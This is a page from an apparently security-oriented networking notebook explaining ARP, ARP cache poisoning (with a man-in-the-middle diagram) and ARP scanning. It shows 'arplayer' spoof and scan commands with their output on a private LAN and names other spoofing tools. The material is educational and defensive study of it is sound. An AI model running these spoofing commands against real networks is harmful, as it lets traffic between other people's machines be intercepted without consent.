πŸ–‹οΈ
Dev & Ops
Network
ProgrammingAdminNetwork
Network
ProgrammingAdminNetwork
  • Network Book
  • Π‘Π΅Ρ‚ΠΈ для самых ΠΌΠ°Π»Π΅Π½ΡŒΠΊΠΈΡ…
  • OSI
    • ΠŸΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρ‹ Π½Π°Π΄ сСтями
      • NAT
      • BGP
      • ΠšΡ€ΠΈΠΏΡ‚ΠΎΠ³Ρ€Π°Ρ„ΠΈΡ‡Π΅ΡΠΊΠΈΠ΅ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρ‹
        • SSL
        • TLS
          • Π Π°ΡΡˆΠΈΡ€Π΅Π½ΠΈΡ
            • TLS-ALPN
        • SSH
        • IPSec
      • ОбмСн сообщСниями (IM) Π² Ρ€Π΅ΠΆΠΈΠΌΠ΅ Ρ€Π΅Π°Π»ΡŒΠ½ΠΎΠ³ΠΎ Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ ΠΈ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎ присутствии (Presence)
        • SIMPLE (Основан Π½Π° SIP)
        • XMPP/Jabber
        • Matrix
      • VoIP
        • Intro
        • ΠŸΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ» SIP
        • ΠŸΠ΅Π½Ρ‚Π΅ΡΡ‚
      • WebRTC
      • VPN
    • L7: Application Layer
      • WEB
        • (Π½Π΅ поддСрТиваСтся) SPDY
        • HTTP
          • WebSockets
          • h2c (HTTP/2 Cleartext)
          • ΠšΠΎΠ΄Ρ‹ ΠΎΡ‚Π²Π΅Ρ‚ΠΎΠ²
          • Π—Π°Π³ΠΎΠ»ΠΎΠ²ΠΊΠΈ
          • URI
        • HTTP/2
        • HTTP/3 (HTTP-over-QUIC)
      • ΠŸΠΎΡ‡Ρ‚ΠΎΠ²Ρ‹Π΅ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρ‹
        • IMAP
        • POP
      • Windows
        • HTTP / Windows
        • LDAP
        • RPC
        • SMB
        • Windows Name Resolution
          • КакиС Π΅ΡΡ‚ΡŒ
          • mDNS
          • LLMNR
          • NBNS
        • WinRM
        • WPAD
      • DHCP
      • NTP
      • DNS
      • FTP
      • SMTP
      • SSH
      • Telnet
    • L6: Presentation Layer
      • SSL/TLS
    • L5: Session Layer
      • SSDP
    • L4: Transport Layer
      • SMPP
      • QUIC
      • UDP
      • TCP
    • L3: Network Layer
      • IP (IPv4, IPv6)
      • ICMP
    • L2: Link Layer
      • ЛогичСскоС Ρ€Π°Π·Π΄Π΅Π»Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΠ² Π½Π° этом ΡƒΡ€ΠΎΠ²Π½Π΅
      • 802.3 (Ethernet/ARP)
      • 802.1Q (VLANs)
      • 802.11 (Wi-Fi)
        • План
        • Атаки
        • Π˜Π½ΡΡ‚Ρ€ΡƒΠΌΠ΅Π½Ρ‚Ρ‹
        • Π‘Ρ‚Π°Ρ‚ΡŒΠΈ
      • NFC
      • Bluetooth
  • Security
    • MiTM
    • Network Pentest Course (youtube)
    • Tools
      • HTTP Proxy
        • mitmproxy
        • broxy
        • netty
        • proxenet
        • ZAP
        • PolarProxy
      • Wireshark
      • Bettercap
      • Impacket
      • Responder
  • Devices
    • Common Network Device Manufacturer
    • Physical Servers
Powered by GitBook
On this page
  • ARP
  • ARP spoof
  • ARP scan
  1. OSI
  2. L2: Link Layer

802.3 (Ethernet/ARP)

PreviousЛогичСскоС Ρ€Π°Π·Π΄Π΅Π»Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΠ² Π½Π° этом ΡƒΡ€ΠΎΠ²Π½Π΅Next802.1Q (VLANs)

Last updated 3 years ago

ARP

Link:

(Address Resolution Protocol) is a link layer protocol heavily used in network that allows to map the relation between the IP address of a computer and its MAC (Media Access Control) address.

In order to do that, the client machine sends an Ethernet broadcast ARP request to the local network, asking for the one that has the target IP address. Then the computer with that IP should respond identifying its MAC. Finally the client sends the application packets to that Ethernet address.

ARP spoof

An attacker could respond to all the ARP requests trying to impersonate other computers. However, computers do not perform a ARP request any time they need to communicate with the target, but they keep the previous responses in a local ARP cache.

$ arp -n
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.101            ether   e4:fd:a1:09:bf:a1   C                     wlp1s0
192.168.1.1              ether   00:e0:4c:d8:ca:89   C                     wlp1s0

By keeping the ARP cache, computers reduce the number of request that it needs to perform. However, computers also listen ARP responses for changes without performing requests, so an attacker could send periodic replies in order to poison the victim ARP cache.


        1)  I am 192.168.1.1           1)    I am 192.168.1.101    
         (MAC de:ad:be:ef:13:37)        (MAC de:ad:be:ef:13:37)
     .--------------<<<------------. .------------->>>---------------.
     |                             | |                               |
     v                             ^ ^                               v
   .---.   2) To 192.168.1.1      .---.   3) To 192.168.1.1        .---.
  /   /| -------->>>--------->   /   /| -------->>>------------>  /   /|
 .---. |                        .---. |                          .---. |
 |   | '   5) To 192.168.1.101  |   | '   4) To 192.168.1.101    |   | '
 |   |/  <-------<<<----------  |   |/  <-------<<<------------- |   |/ 
 '---'                          '---'                            '---'  
192.168.1.101                   192.168.1.137                   192.168.1.1
e4:fd:a1:09:bf:a1            de:ad:be:ef:13:37              00:e0:4c:d8:ca:89
$ ./arplayer spoof -I wlp1s0 -vvv -F -b 192.168.1.101 192.168.1.1
Spoofing - telling 192.168.1.101 (e4:fd:a1:09:bf:a1) that 192.168.1.1 is 00:e0:4c:d8:ca:89 (192.168.1.107) every 1.0 seconds (until Ctrl-C)
INFO - 192.168.1.1-de:ad:be:ef:13:37 -> 192.168.1.101-e4:fd:a1:09:bf:a1
INFO - 192.168.1.101-de:ad:be:ef:13:37 -> 192.168.1.1-00:e0:4c:d8:ca:89
INFO - 192.168.1.1-de:ad:be:ef:13:37 -> 192.168.1.101-e4:fd:a1:09:bf:a1
INFO - 192.168.1.101-de:ad:be:ef:13:37 -> 192.168.1.1-00:e0:4c:d8:ca:89
INFO - 192.168.1.1-de:ad:be:ef:13:37 -> 192.168.1.101-e4:fd:a1:09:bf:a1
INFO - 192.168.1.101-de:ad:be:ef:13:37 -> 192.168.1.1-00:e0:4c:d8:ca:89

ARP scan

Other interesting possibility using ARP is to request all the IPs in the network in order to check the ARP responses and discover what hosts are active. This technique is known as ARP scan.

$ ./arplayer scan -I wlp1s0 -w 10 -t 1000
192.168.1.1 00:e0:4c:d8:ca:89
192.168.1.101 e4:fd:a1:09:bf:a1

You can perform an ARP spoofing/poisoning attack with tools like , , or .

https://zer1t0.gitlab.io/posts/attacking_ad/#arp
ARP
ettercap
bettercap
arpspoof
arplayer